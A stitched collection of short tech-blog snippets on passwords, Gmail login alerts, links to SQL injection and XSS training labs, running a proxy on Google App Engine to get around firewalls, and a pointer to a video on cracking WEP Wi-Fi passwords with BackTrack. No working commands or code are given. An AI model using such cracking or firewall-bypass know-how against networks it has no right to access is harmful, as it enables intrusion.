You're constantly told how easy it would be to hack your weak passwords, but complicated passwords just aren't something our brains get excited about memorizing. Reader calculusrunner offers a brilliant tip that turns weak passwords into something much, much better. More »

Big enterprises that force their workers to change their access passwords on a regular basis, and adhere to complex rules when they do, might be their own worst enemy. At least that's how Boston Globe editor Mark Pothier sees it, and he cites a Microsoft research paper as part of his argument against that and other seemingly perfunctory IT rules. We prefer using a solid root password and subtle variations to implement secure passwords, along with easy-but-secure browser tools. What does your own office require of your passwords, and do you think it helps or hurts? [Boston Globe via Gizmodo] More »

Gmail launched a new feature this morning designed to detect suspicious activity in your account and notify you when a suspicious login has occurred in your account. More »

For those who were in my talk today, I mentioned that the SQL injection and XSS demos are actually labs that you can find on the Internet.

Here's links to them. I built these for Patterns & Practices a few years ago.

http://channel9.msdn.com/Wiki/SecurityWiki/InputValidationTrainingModules/

There's more here than just the two I mentioned - enjoy!

Keith

Finding a good proxy is difficult. You either have to run it yourself from your home computer or web server, or you're left scavenging about for free proxies online. Instead, you can run one for free through the Google App Engine.
If you want total control over your proxy experience, you can always run a home proxy. We showed you how to set one up last month with our guide to bypassing heavy-handed firewalls. While you're tinkering away with your home network it's also worth setting up a SSH SOCKS proxy to encrypt and secure all your remote traffic too.

If you don't want to leave your computer on all the time or be limited by the speed of your home internet connection however, you can use a Google account to set up a proxy server that runs off the Google Apps Engine and allows you to browse via proxy independent of your home network and without having to trust a sketchy third-party proxy. You'll be running your own proxy server through the Apps Engine, free for you to tweak. They've put together a detailed guide at Digital Inspiration, check out the video below:

For step by step instructions, including lots of screen shots, visit the link below. Have your own way for circumventing firewalls and browsing on your own terms? Let's hear about it in the comments.

How-To Setup Your Own Web Proxy Server for Free with Google Apps Engine [Digital Inspiration]

Last summer we detailed how to crack a Wi-Fi network's WEP password using BackTrack. Now video blog Tinkernut revisits the subject with a great video step-by-step of the process.
Before you go calling the cops or putting on your bank robber mask, a helpful reminder from our original post:

Knowledge is power, but power doesn't mean you should be a jerk, or do anything illegal. Knowing how to pick a lock doesn't make you a thief. Consider this post educational, or a proof-of-concept intellectual exercise.

BackTrack has also updated to version 4 since we last featured it, but the process appears to have remained basically the same. The interesting thing about BackTrack is how easy it is to crack a WEP-encrypted network, which serves as a very good reminder to use WPA encryption to significantly boost your home network security.

How To Hack Wireless [Tinkernut]